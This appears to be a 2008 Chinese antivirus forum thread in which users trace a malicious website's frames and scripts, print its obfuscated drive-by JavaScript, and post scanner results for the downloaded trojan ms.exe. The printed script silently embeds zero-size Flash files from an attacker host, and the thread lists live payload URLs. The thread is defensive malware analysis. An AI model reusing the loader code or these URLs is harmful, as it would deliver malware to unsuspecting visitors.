http://1.51xj.net

显示全部楼层 · 发表于 2008-6-2 22:29:19

Log is generated by FreShow.
[wide]http://1.51xj.net
[frame]http://daima.ling8888.cn/newunion_3.htm?id=1337&key=mn758
      [script]http://daima.ling8888.cn/UnionCode_3.js
      [script]http://s54.cnzz.com/stat.php?id=412950&web_id=412950&online=1&show=line
         [script]http://222.77.187.9/online.php?id=412950&online=1&show=line
[script]http://s138.cnzz.com/stat.php?id=841333&web_id=841333
[script]http://z.link88.be/zclick.js
[frame]http://www.ninig.cn/bak/1035.htm
      [frame]http://www.ninig.cn/bak/../zzz.htm
      [script]http://s86.cnzz.com/stat.php?id=892252&web_id=892252

<html>
<script>
window["onerror"]=function(){return true;}
function init(){window["status"]="";}window["onload"] = init;
if(window["document"]["cookie"]["indexOf"]("play=")==-1)
{
var MLDV1=new window["Date"]();
MLDV1["setTime"](MLDV1["getTime"]()+24*60*60*1000);
window["document"]["cookie"]="play=Yes;path=/;expires="+MLDV1["toGMTString"]();
if(navigator["userAgent"]["toLowerCase"]()["indexOf"]("msie")>0)
{
window["document"]["write"]('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');
window["document"]["write"]('<param name="allowScriptAccess" value="sameDomain"/>');
window["document"]["write"]('<param name="movie" value="http://www.re159.cn/4561.swf"/>');
window["document"]["write"]('<param name="quality" value="high"/>');
window["document"]["write"]('<param name="bgcolor" value="#ffffff"/>');
window["document"]["write"]('<embed src=http://www.re159.cn/4561.swf"/>');
window["document"]["write"]('</object>');
}
else{window["document"]["write"]("<EMBED src=http://www.re159.cn/4562.swf width=0 height=0>");}
}
</script>
<html>

红色部分嗅探不到，高手支援！

显示全部楼层 · 发表于 2008-6-2 22:38:02

htp://www.re159.cn/ms.exe

显示全部楼层 · 发表于 2008-6-2 22:40:27

病毒 2008-06-02 22:40:29 C:\Documents and Settings\Administrator\桌面\ms.rar\ms.exe Win32.Troj.Agent.cd.200704 跳过，未处理

显示全部楼层 · 发表于 2008-6-2 22:43:25

RS20.47.02未杀！

显示全部楼层 · 发表于 2008-6-2 22:45:11

When accessing data from the URL, "http://bbs.kafan.cn/attachment.php?aid=277017&k=fd19714ad676a904bdaba0ddcb00990f&t=1212417864"
a virus or unwanted program 'HEUR/Malware' [heuristic] was found.
Action taken: Blocked file

显示全部楼层 · 发表于 2008-6-2 23:06:39

The file 'ms.exe' has been determined to be 'MALWARE'. Detection is added to our virus definition file (VDF) starting with version 7.00.04.127. Please note that Avira's proactive heuristic detection module AHeAD detected this threat up front without the latest VDF update as: TR/PSW.OnlineGames.alln.2.

--------------------------------------------------------------------------------

显示全部楼层 · 发表于 2008-6-2 23:10:31

对象: ms.exe
在压缩档案里: F:\ms.rar
Status: 已发现病毒
病毒: Trojan.Crypt.Delf.D (BD 引擎)

显示全部楼层 · 发表于 2008-6-2 23:12:26

MS我开着金山进去没报？

显示全部楼层 · 发表于 2008-6-2 23:18:50

转了一圈，没发现什么奇怪的地方
除了那个网站的名字劲爆了点~~

不过，那个flash明显十分的可疑，可惜目前还没有什么杀毒软件能够认出他
反编译的时候出现问题，ie调试的时候，发现文件缺少对象，可能在二次制作的时候出了问题。~~~

显示全部楼层 · 发表于 2008-6-2 23:19:59

20080602 151939 扫描 '单击右键扫描' 已启动。
20080602 151939 在 'C:\Documents and Settings\Administrator\桌面\ms.rar\ms.exe' 中检测到病毒/间谍软件'Mal/Behav-156'。清除不可用。
20080602 151939 感染病毒的文件"C:\Documents and Settings\Administrator\桌面\ms.rar"已删除。
20080602 151939 扫描 '单击右键扫描' 已完成。
20080602 151939 扫描'单击右键扫描'摘要：
已扫描项目：6
错误：0
已隔离项目：0
已处置项目：1

[已鉴定] http://1.51xj.net

3/0